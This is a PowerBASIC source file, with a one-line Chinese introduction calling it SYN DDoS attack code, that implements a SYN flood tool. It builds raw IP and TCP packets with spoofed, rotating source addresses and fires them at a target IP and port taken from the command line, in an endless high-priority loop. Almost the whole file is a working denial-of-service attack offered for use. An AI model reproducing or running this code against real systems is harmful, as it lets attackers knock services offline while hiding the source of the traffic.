synflood.bas

这个是用POWERBASIC写的一个SYN DDOS攻击的代码

#Compile Exe
#Register None
#Dim All
#Include "Win32Api.Inc"
#Include "WS2_32.inc"

%SEQ = &H28376839
%IP_HDRINCL =2
$FAKE_IP = "201.79.131.18"
$Right = "===============Coder Paris-ye====================\n"
Declare Function checksum(ByVal buffer As Word Ptr, ByVal Size As Long) As Word
Declare Function flood() As Long

'TCP头 20位
Type TCP_HEADER
    th_sport As Word    '16位源端口
    th_dport As Word    '16位目的端口
    th_seq As Dword     '32位序列号
    th_ack As Dword     '32位确认号
    th_lenres As Byte   '4位首部长度+6位保留字中的4位
    th_flag As Byte     '2位保留字+6位标志位 2是SYN，1是FIN，16是ACK探测
    th_win As Dword     '16位窗口大小
    th_sum As Dword     '16位校验和
    th_urp As Dword     '16位紧急数据偏移量
End Type

'IP 头 20位
Type IP_HEADER
    h_verlen As Byte    '4位首部长度+4位IP版本号
    tos As Byte         '8位服务类型TOS，定义了数据传输的优先级、延迟、吞吐量和可靠性等特性
    total_len As Word   '16位总长度（字节） IP包的长度，若没有特殊选项，一般为20字节长
    ident As Word       '16位IP包标识，主机使用它唯一确定每个发送的数据报
    frag_and_flags As Word  'Fragment Offset 13 IP数据分割偏移
    ttl As Byte         '8位生存时间TTL，每通过一个路由器，该数值减一
    proto As Byte       '8位协议号(TCP, UDP 或其他) 比如：ICMP为1，IGMP为2，TCP为6，UDP为17等
    checksum As Word    '16位IP首部校验和
    sourceIP As Long    '32位源IP地址
    destIP As Long      '32位目的IP地址
End Type

'TCP伪头 12位
Type PSD_HEADER
    saddr As Dword      '源地址
    daddr As Dword      '目的地址
    mbz As Byte         '置空
    ptcl As Byte        '协议类型
    tcpl As Word        'TCP长度
End Type

Global pwsaData As WSADATA
Global sockMain As Long
Global ErrorCode,flag,pTimeOut,FakeIpNet,FakeIpHost,dataSize,SendSEQ As Long
Global activPort As Word
Global psockAddr As sockaddr_in
Global tcpheader As TCP_HEADER
Global ipheader As IP_HEADER
Global psdHeader As PSD_HEADER
Global sendBuf As Asciiz * 128

Macro Function shr(prm1,prm2)
    MacroTemp pprm1
    Local pprm1 As Long
    pprm1 = prm1
    Shift Right pprm1, prm2
End Macro = pprm1

Macro Function shl(prm1,prm2)
    MacroTemp pprm1
    Local pprm1 As Long
    pprm1 = prm1
    Shift Left pprm1, prm2
End Macro = pprm1

'获取完整进程路径
Function AppFullName() As String
    Local Buffer    As Asciiz * %MAX_PATH
    GetModuleFileName GetModuleHandle(ByVal 0&), Buffer, SizeOf(Buffer)
    If Len(Buffer) Then
        Function = Buffer
    End If
End Function

Function ArgC() As Long

  Local arg As Long
  Local f   As String
  Local q   As Long
  Local cmd As String

  cmd = Command$

  Do While Len(cmd)
    Incr arg
    f = Left$(cmd, 1)
    If Asc(f) = 34 Then
      q = InStr(Mid$(cmd,2), $Dq)
      If q Then
        f = Left$(cmd, q+1)
      Else
        f = cmd
      End If
    Else
       f = f + Extract$(Mid$(cmd,2), Any $Dq+" /")
    End If
    cmd = LTrim$(Mid$(cmd, Len(f)+1))
  Loop

  Function = arg

End Function

Function ArgV(ByVal Which As Long) As String

  Local arg As Long
  Local f   As String
  Local q   As Long
  Local cmd As String

  cmd = Command$

  Do While Len(cmd)
    Incr arg
    f = Left$(cmd, 1)
    If Asc(f) = 34 Then
      q = InStr(Mid$(cmd,2), $Dq)
      If q Then
        f = Left$(cmd, q+1)
      Else
        f = cmd
      End If
    Else
      f = f + Extract$(Mid$(cmd,2), Any $Dq+" /")
    End If
    cmd = LTrim$(Mid$(cmd, Len(f)+1))
    If arg = which Then
      Exit Do
    Else
      f = ""
    End If
  Loop

  Function = f

End Function

Function checksum(ByVal buffer As Word Ptr, ByVal Size As Long) As Word
    Local cksum As Word
    Local iLoop As Long
    While(Size >1)
        cksum = cksum + @buffer[iLoop]
        Size = Size - 2
        Incr iLoop
    Wend
    If (Size) Then cksum = cksum + @buffer[iLoop]

    cksum = shr(cksum,16) + (cksum And &HFFFF??)
    cksum = cksum + shr(cksum,16)
    Function = (Not cksum)
End Function

Function PBMain()
    Local portNum As Long
    Local dw As Dword
    Local hThread As Dword
    Local putInfo As String

    flag = %TRUE
    pTimeOut = 2000
    activPort = 40000

    If (argc<>2) Then
        StdOut($right)
        StdOut("Invalid command,Pls use:")
        StdOut(AppFullName & " <IP> <port>")
        StdOut("Example:" & AppFullName & " 192.168.100.244 80")
        Exit Function
    End If

    ErrorCode=WSAStartup(MakWrd(2,1),ByVal VarPtr(pwsaData))
    If (ErrorCode <> 0) Then
        StdOut("WSAStartup failed:" & Str$(ErrorCode))
        Exit Function
    End If

    sockMain=WSASocket(%AF_INET,%SOCK_RAW,%IPPROTO_RAW,ByVal %NULL,0,%WSA_FLAG_OVERLAPPED)
    If (sockMain=%INVALID_SOCKET) Then
        StdOut("Socket failed:" & Str$(WSAGetLastError()))
        Exit Function
    End If

    ErrorCode=setsockopt(sockMain,%IPPROTO_IP,%IP_HDRINCL,flag,4)
    If (ErrorCode=%SOCKET_ERROR) Then
        StdOut("Set sockopt failed:" & Str$(WSAGetLastError()))
        Exit Function
    End If
    ErrorCode=setsockopt(sockMain,%SOL_SOCKET,%SO_SNDTIMEO,pTimeOut,SizeOf(pTimeOut))
    If (ErrorCode=%SOCKET_ERROR) Then
        StdOut ("Set sockopt time out failed:" & Str$(WSAGetLastError()))
        Exit Function
    End If

    portNum=Val(argv(2))
    'portNum=80

    ZeroMemory(ByVal VarPtr(psockAddr),SizeOf(psockAddr))
     psockAddr.sin_family=%AF_INET
     psockAddr.sin_addr.s_addr =inet_addr(argv(1))
     'psockAddr.sin_addr.s_addr =inet_addr("220.181.6.6")
     FakeIpNet=inet_addr($FAKE_IP)
     FakeIpHost=ntohl(FakeIpNet)

     ipheader.h_verlen = shl(4,4) Or (SizeOf(IP_HEADER) / 4)
     ipheader.total_len = htons(SizeOf(IP_HEADER)+SizeOf(TCP_HEADER))
     ipheader.ident = 1
     ipheader.frag_and_flags = 0
     ipheader.ttl = 128
     ipheader.proto = %IPPROTO_TCP
     ipheader.checksum =0
     ipheader.sourceIP = htonl(FakeIpHost+SendSEQ)
     ipheader.destIP = inet_addr(argv(1))
     'ipheader.destIP = inet_addr("220.181.6.6")

     tcpheader.th_dport=htons(portNum)
     tcpheader.th_sport = htons(portNum)
     tcpheader.th_seq = htonl(%SEQ+SendSEQ)
     tcpheader.th_ack = 0
     tcpheader.th_lenres =shl(SizeOf(TCP_HEADER) / 4,4) Or 0
     tcpheader.th_flag = 2
     tcpheader.th_win = htons(16384)
     tcpheader.th_urp = 0
     tcpheader.th_sum = 0

     psdHeader.saddr=ipheader.sourceIP
     psdHeader.daddr=ipheader.destIP
     psdHeader.mbz=0
     psdHeader.ptcl=%IPPROTO_TCP
     psdHeader.tcpl=htons(SizeOf(tcpheader))
     StdOut($Right)
     hThread=CreateThread(ByVal %NULL,0,CodePtr(flood),0,%CREATE_SUSPENDED,dw)
     SetThreadPriority(hThread,%THREAD_PRIORITY_HIGHEST)
     ResumeThread(hThread)
     StdOut("Warning[start]...........Press any key to stop!")
     WaitKey$
     'putInfo=getchar()
     TerminateThread(hThread,0)
     WSACleanup()
     StdOut("Stopd...........")

     'return 0;

End Function



Function flood() As Long
    While (1)
        Incr SendSEQ
        Incr activPort
        If (SendSEQ=65536) Then SendSEQ=1
        If (activPort=40010) Then activPort=1000
        ipheader.checksum =0
        ipheader.sourceIP = htonl(FakeIpHost+SendSEQ)
        tcpheader.th_seq = htonl(%SEQ+SendSEQ)
        tcpheader.th_sport = htons(activPort)
        tcpheader.th_sum = 0
        psdHeader.saddr=ipheader.sourceIP
        CopyMemory(ByVal VarPtr(sendBuf), ByVal VarPtr(psdHeader),SizeOf(PSD_HEADER))
        CopyMemory(ByVal VarPtr(sendBuf)+SizeOf(PSD_HEADER),ByVal VarPtr(tcpheader),SizeOf(tcpheader))
        tcpheader.th_sum=checksum(ByVal VarPtr(sendBuf),SizeOf(PSD_HEADER)+SizeOf(tcpheader))

        CopyMemory(ByVal VarPtr(sendBuf),ByVal VarPtr(ipheader),SizeOf(ipheader))
        CopyMemory(ByVal VarPtr(sendBuf)+SizeOf(ipheader),ByVal VarPtr(tcpheader),SizeOf(tcpheader))
        ZeroMemory(ByVal VarPtr(sendBuf)+SizeOf(ipheader)+SizeOf(tcpheader),4)
        dataSize=SizeOf(ipheader)+SizeOf(tcpheader)
        ipheader.checksum=checksum(ByVal VarPtr(sendBuf),dataSize)
        CopyMemory(ByVal VarPtr(sendBuf),ByVal VarPtr(ipheader),SizeOf(ipheader))
        ErrorCode=sendto(sockMain,sendBuf,dataSize,0,psockAddr,SizeOf(psockAddr))
        If (ErrorCode=%SOCKET_ERROR) Then
            StdOut("Can't connect this IP!Pls check it.")
            ExitThread(1)
        End If
        Sleep 1
        'Sleep(1000);
    Wend
    'return 0;
End Function